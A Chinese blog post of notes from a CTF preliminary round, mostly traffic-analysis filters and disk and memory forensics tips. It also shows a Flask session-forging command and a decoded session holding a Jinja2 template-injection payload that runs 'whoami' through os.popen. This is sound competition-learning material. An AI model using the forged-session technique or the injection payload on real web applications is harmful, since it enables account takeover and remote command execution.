2023第二届陇剑杯网络安全大赛 预选赛复盘学到的一些经验

从客户端到服务器的流量被标记为红色,而从服务器到客户端的流量被标记为蓝色。

TCP扫描确认端口开放的标志就是返回SYN+ACK的包,所以只需要过滤SYN、ACK状态都为1的包即可

html 复制代码
tcp.flags.syn==1 and tcp.flags.ack==1

选择HTTP流是因为经过gzip解码的,如果是追踪TCP流还需要解码gzip

就比如在Cyberchef解密wireshark中AES加密后的流量时,要复制原始数据,再在Cyberchef中选择From Hex的Auto,后AES Decrypto,最后还要Gunzip

查看Nginx中的访问日志,tail /var/log/nginx/access.log

计算md5: php -r "var_dump(md5('81.70.166.3'));"

echo -n 'shirodeserialization'|md5sum|cut -d '' -f1

last查看登录记录

DiskGenius打开.vmdk发现是BitLocker加密的磁盘,但是给了内存镜像,直接尝试EFDD提取恢复密钥,先使用ArsenalImageMounter将BitLocker加密磁盘挂载起来

thekeyis经过rot47后E96<6J:D

pslist之前一眼便签,西湖论剑2021中国杭州网络安全技能大赛部分Writeup_西湖论剑题目附件-CSDN博客肯定有东西,直接寻找.snt结尾的文件,导出StikyNot.exe:Windows便签程序

用`

R-Studio翻,最后在C:/Users/admin/Music下找到个i4ak3y`

PS:R-Studio是个神器,好好利用

根据请求正确过滤返回特征根据返回特征,直接尝试检索:tcp contains "{\"errCode\":200}"

直接过滤关键字:tcp contains "jdbc" and tcp contains "username" and tcp contains "password"

直接检索jdbc的payload:tcp contains "jdbc:"

flask框架的session是存储在客户端的,那么就需要解决session是否会被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。

如果知道key可以使用下面这条命令进行session伪造

python flask_session_cookie_manager3.py encode -s 'LitCTF' -t '{"name":"admin"}'

下面是如果要解密session

flask_session_cookie_manager3.py decode -s "ssti_flask_hsfvaldb" -c ".eJwdx1EKwyAMANCrDEGiPz1Ar1KGZBi7gBpplH2Idy_d-3vTDKWrYiGzm2k5vZRUWeo2WsRObkLKeMKeuekoB4RwZvlg1hDg_S917lSeOhAFf0CTRvXp7ytYGPx2EUbnl7drWqqRk11m3cGmKw0.YpIQcw.J5vs8t8bAr0xDIxF6EqUAH2kkLE"

{'username': "{%if session.update({'flag':lipsum'__globals__''_getite_'('os')'popen'('whoami').read()})%}{%endif%}"}

参考的writeup:2023第二届陇剑杯网络安全大赛 预选赛Writeup_陇剑杯writeup_末 初的博客-CSDN博客

相关推荐
带娃的IT创业者11 小时前
突破算力与安全的边界:深度解析 Mythos AI 的“受信发布”机制与技术影响
人工智能·安全·大语言模型·ai安全·mythos ai·受信发布·ai监管
落寞的星星11 小时前
引言:加密不等于安全
安全
SRET11 小时前
Mineradio 沙盒隔离安装完全指南 | 一键安全运行 Electron 应用!!!
javascript·经验分享·安全·electron·aigc·音视频·ai编程
全栈前端老曹12 小时前
【MongoDB】安全与权限管理 —— 用户认证、角色权限、SSL 加密
前端·javascript·数据库·安全·mongodb·nosql·ssl
星河耀银海12 小时前
大模型安全:对抗攻击与防御方法
人工智能·安全·大模型
广东帝工智能安防12 小时前
智能设防精准预警,筑牢内河桥梁通航安全防护网
安全·桥梁防撞·智慧航道·防撞预警系统
kali-Myon13 小时前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全
志栋智能14 小时前
超自动化安全中的威胁狩猎
运维·安全·自动化
梦想的颜色14 小时前
【Docker部署插件】:使用 Docker 部署生产级 Kafka 完整版教程
安全·docker·中间件·kafka·消息队列·docker-compose·后端开发
lularible16 小时前
HSM技术精讲(3.8):证书对象——数字世界的“身份证明“
安全·开源·嵌入式·汽车电子·hsm